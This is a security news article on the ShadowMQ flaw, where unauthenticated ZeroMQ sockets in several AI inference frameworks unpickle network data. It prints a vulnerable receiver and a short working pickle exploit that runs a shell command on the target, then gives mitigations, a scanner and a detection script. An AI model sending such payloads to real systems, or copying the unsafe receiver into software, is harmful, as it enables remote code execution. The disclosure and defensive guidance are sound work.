ShadowMQ Flaw Exposes AI Inference Engines to Remote Code Execution

Oligo Security researchers found a recurring unsafe pattern in several AI inference frameworks that can allow remote code execution when unauthenticated ZeroMQ sockets deserialize Python objects.

The pattern, called ShadowMQ, centers on code that receives serialized Python objects over a network socket and immediately deserializes them with pickle or an equivalent method.

ZeroMQ’s recv_pyobj() (or equivalent code that feeds received bytes to Python’s pickle.loads()) lets an attacker who can reach the ZMQ listener deliver a crafted payload that executes arbitrary code on an inference node.
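The mechanics are easy to demonstrate. A minimal sketch of the vulnerable receiver (hypothetical code, not taken from any affected project; the socket type and port are illustrative) looks like this:

```python
import zmq

# Vulnerable receiver: binds a plain TCP socket and unpickles whatever arrives.
ctx = zmq.Context()
sock = ctx.socket(zmq.PULL)
sock.bind("tcp://0.0.0.0:5555")  # reachable by anyone who can route to this port

obj = sock.recv_pyobj()  # equivalent to pickle.loads(sock.recv())
```

Because pickle invokes an object’s __reduce__ method during deserialization, a client can send an object whose __reduce__ returns a function call, and that call runs inside the receiver. A sketch of the attacker’s side (again hypothetical; host, port, and command are placeholders):

```python
import os
import pickle
import zmq

class Exploit:
    # pickle calls __reduce__ while deserializing, so loads() runs os.system.
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect("tcp://victim:5555")
sock.send(pickle.dumps(Exploit()))  # the receiver's recv_pyobj() runs the command
```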

Oligo found the unsafe logic copied across projects, producing related vulnerabilities in multiple products: vLLM (CVE-2025-30165), NVIDIA TensorRT-LLM (CVE-2025-23254), Modular Max Server (CVE-2025-60455), and earlier issues in Meta’s Llama components (CVE-2024-50050).

Vendors issued fixes for several products: NVIDIA patched TensorRT-LLM in version 0.18.2, Modular published a corrective commit, and vLLM reduced its exposure by making a different engine the default. Some components remained unpatched at the time of disclosure.

Because inference nodes often hold model weights and access internal storage, exploitation can enable model theft, lateral movement inside clusters, and deployment of persistent payloads such as cryptominers (see related analysis in Machine-Speed Security).

Recommended mitigations include applying vendor patches, preventing public exposure of ZMQ listeners (bind sockets to localhost or private interfaces), replacing pickle-based deserialization with safe formats (JSON, protobuf), and enabling ZMQ authentication/encryption (CURVE) or TLS-proxied transports.
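As a concrete illustration of those last points, the sketch below (hypothetical; the endpoint and message shape are placeholders, and a real deployment would distribute keys out of band) swaps recv_pyobj() for recv_json(), binds to loopback, and enables CURVE encryption on the socket:

```python
import zmq

ctx = zmq.Context()
sock = ctx.socket(zmq.PULL)

# CURVE: the server holds a long-term keypair, and clients must know the server's
# public key to connect. A ZAP authenticator (zmq.auth.thread.ThreadAuthenticator)
# can additionally restrict which client public keys are accepted.
server_public, server_secret = zmq.curve_keypair()
sock.curve_secretkey = server_secret
sock.curve_publickey = server_public
sock.curve_server = True

# Bind to loopback instead of 0.0.0.0.
sock.bind("tcp://127.0.0.1:5555")

# recv_json() parses plain JSON and cannot instantiate arbitrary Python objects.
msg = sock.recv_json()
```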

Operators should also harden runtimes: run inference services with least privilege, add container and process isolation, and audit code for deserialization patterns such as pickle.loads and recv_pyobj during review and automated scans.
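For the audit step, even a crude scanner surfaces copied instances of the pattern before review. A minimal sketch (hypothetical; the regex could be extended to cover other unsafe deserializers such as yaml.load):

```python
import pathlib
import re

# Flag calls that turn untrusted bytes into live Python objects.
PATTERN = re.compile(r"\b(pickle\.loads|recv_pyobj)\s*\(")

for path in pathlib.Path(".").rglob("*.py"):
    for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
        if PATTERN.search(line):
            print(f"{path}:{lineno}: {line.strip()}")
```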

Defenders should monitor for unexpected inbound connections to ZMQ ports, instrument framework logs to surface deserialization calls and exceptions, and hunt for post-deserialization signs of compromise (unexpected Python child processes, new binaries, or unusual outbound connections).
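One simple hunt along those lines (a sketch, assuming psutil is available; the shell names are illustrative) flags shells spawned beneath a Python process, a common artifact of pickle payloads that call os.system:

```python
import psutil

SUSPECT = {"sh", "bash", "dash"}  # shells a pickle payload typically spawns

for proc in psutil.process_iter(["pid", "name"]):
    try:
        parent = proc.parent()
        if parent and "python" in parent.name().lower() and proc.info["name"] in SUSPECT:
            print(f"suspicious child: pid={proc.info['pid']} "
                  f"name={proc.info['name']} parent_pid={parent.pid}")
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        continue
```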

Because the pattern spread through simple code reuse, reducing long-term risk also requires process changes: secure-by-default patterns, stricter code review for copied snippets, and coordinated vendor disclosure and patching (see related cases in this article).

The original technical report is available from Oligo Security at https://www.oligo.security/blog/shadowmq-how-code-reuse-spread-critical-vulnerabilities-across-the-ai-ecosystem

“All contained nearly identical unsafe patterns: pickle deserialization over unauthenticated ZMQ TCP sockets,” Avi Lumelsky of Oligo Security said.